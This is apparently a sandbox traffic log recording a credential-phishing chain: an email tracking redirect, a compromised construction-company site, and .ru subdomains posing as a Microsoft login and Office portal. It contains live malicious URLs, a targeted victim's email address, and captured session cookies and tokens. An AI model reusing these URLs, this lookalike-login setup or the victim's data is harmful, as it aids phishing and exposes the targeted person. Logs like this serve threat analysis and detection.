              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSPRequ=id=N&lt=1706901476&co=5; uaid=c9bbf5863cb749e4968c855cb9b06dff; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSPRequ=id=N&lt=1706901476&co=5; uaid=c9bbf5863cb749e4968c855cb9b06dff; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRw
              Source: global trafficHTTP traffic detected: GET /16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /16.000/content/js/ConvergedLoginPaginatedStrings.en_hvJVkkYnJRncZtU7cDywlg2.js HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ywnjb.q2zg22.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_yZQmhMbiqPW1IsJcdAPQ0A2.js HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ywnjb.q2zg22.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_b2365db90edea8b1b8b1.js HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /16.000.30091.10/images/favicon.ico HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ywnjb.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /16.000.30091.10/images/favicon.ico HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XN7tdkbw6C3m8Lv&MD=htgtz4Vy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit HTTP/1.1Host: sushishop.commander1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; tc_cj_v2_med=%7B%7D%2F0; TCID=16fae09848cf2bf078ca3f065e274a8a; TCSESSION=20240202201741992404317; TCREDIRECT=1; TCREDIRECT_DEDUP=1; tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKNPSJJJZZZ%5Dfc%5De
              Source: global trafficHTTP traffic detected: GET /nin/niit/ HTTP/1.1Host: galeonconstruction.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mail/inbox/ HTTP/1.1Host: microsoft-d2vkbmvzwzgf.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA
              Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: react.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; OH.DCAffinity=OH-ncu; OH.FLID=3541f66b-883d-474b-bada-1a5283ac2b01; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; 